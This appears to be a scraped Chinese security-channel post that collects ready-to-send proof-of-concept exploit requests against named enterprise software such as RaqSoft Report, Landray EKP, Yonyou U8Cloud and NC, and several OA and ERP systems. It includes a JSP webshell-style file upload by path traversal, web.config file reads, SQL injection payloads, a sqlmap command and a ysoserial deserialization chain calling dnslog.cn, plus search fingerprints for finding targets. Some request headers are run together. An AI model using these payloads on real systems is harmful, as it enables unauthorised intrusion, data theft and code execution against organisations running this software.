润乾报表dataSphereServlet接口存在任意文件上传漏洞
body="润乾报表" || body="/raqsoft"
上传后路径:网站根目录
body="润乾报表" || body="/raqsoft"
POST /servlet/dataSphereServlet?action=38 HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 397
Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"
Content-Type: text/plain
<% out.println("123456"); %>
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="path"
../../../
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="saveServer"
1
--eac629ee4641cb0fe10596fba5e0c5d9--
上传后路径:网站根目录
👍1
启明星辰 天玥网络安全审计系统 SQL注入漏洞
python sqlmap.py -u "https://ip/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" --skip-waf --random-agent --dbs --batch --force-ssl
蓝凌EKPsys_ui_component远程命令执行漏洞
POST /sys/ui/sys_ui_component/sysUiComponent.doHTTP/1.1
Host: Accept:application/json,text/javanoscript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Length:401
Content-Type:multipart/form-data;
boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
Origin:http://www.baidu.com
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36X-Requested-With:XMLHttpRequest
------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="method"
replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51
赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞
GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
数字通指尖云平台-智慧政务OA PayslipUser SQL注入漏洞
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=%28SELECT+4655+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*Connection: keep-alive
用友U8Cloud MonitorServlet反序列化漏洞
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
payload
用友NC querygoodsgridbycodeSQL注入漏洞
GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
Host:
Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Pragma: no-cache
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache
👍1
天问物业ERP系统AreaAvatarDownLoad任意文件读取漏洞
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
用友U8
Cloud ActionServlet SQL注入漏洞
Cloud ActionServlet SQL注入漏洞
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
livenvr青柿视频管理系统channeltree接口未授权访问
GET /api/v1/device/channeltree?serial=&pcode HTTP/1.1Host:
GET /#/screen HTTP/1.1Host:
目前未复现成功的漏洞
北京筑业建设工程资料同步跟踪检查与流转交互云平台密码重置漏洞
同鑫科技 EHR 系统全系列 SQL 注入漏洞
金和 OA C6CreateGroup 接口注入漏洞
奇安信天擎远程代码执行漏洞
北京筑业建设工程资料同步跟踪检查与流转交互云平台密码重置漏洞
同鑫科技 EHR 系统全系列 SQL 注入漏洞
金和 OA C6CreateGroup 接口注入漏洞
奇安信天擎远程代码执行漏洞
❤3